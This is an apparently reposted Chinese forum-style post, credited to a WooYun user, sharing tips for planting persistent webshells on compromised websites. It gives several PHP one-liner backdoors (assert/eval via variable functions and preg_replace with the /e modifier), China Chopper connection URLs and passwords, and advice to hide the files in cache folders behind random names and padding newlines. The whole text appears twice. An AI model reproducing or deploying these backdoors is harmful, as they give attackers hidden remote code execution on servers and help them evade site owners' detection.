网站留webshell的一些技巧
程序员文章站
2023-11-25 21:03:16
网站留webshell的一些技巧...
来自乌云的坏虾
我喜欢建在缓存文件夹下面。~aadssfdswr~fsdgdfg.php 然后一顿回车,在最后面添加一段
first:1.php
<?php ($_=@$_get[2]).@$_($_post[1])?>菜刀里写:http://localhost/1.php?2=assert
密码:1
second:2.php
代码如下:
菜刀里写:http://localhost/2.php?_=assert&__=eval($_post['pass'])
密码:pass
我发的这些都是网上公开的了,想让人发现不了,就自己整点有意思的。
我现在喜欢用这个
@preg_replace(“/[email]/e”,$_post['h'],”error”);
?>
菜刀附加数据:
h=@eval($_post[c]);
密码 c
不过仔细查下preg_replace,还是会被发现。 一样,都是已经被公开的了。
我喜欢建在缓存文件夹下面。~aadssfdswr~fsdgdfg.php 然后一顿回车,在最后面添加一段
first:1.php
<?php ($_=@$_get[2]).@$_($_post[1])?>菜刀里写:http://localhost/1.php?2=assert
密码:1
second:2.php
代码如下:
菜刀里写:http://localhost/2.php?_=assert&__=eval($_post['pass'])
密码:pass
我发的这些都是网上公开的了,想让人发现不了,就自己整点有意思的。
我现在喜欢用这个
@preg_replace(“/[email]/e”,$_post['h'],”error”);
?>
菜刀附加数据:
h=@eval($_post[c]);
密码 c
不过仔细查下preg_replace,还是会被发现。 一样,都是已经被公开的了。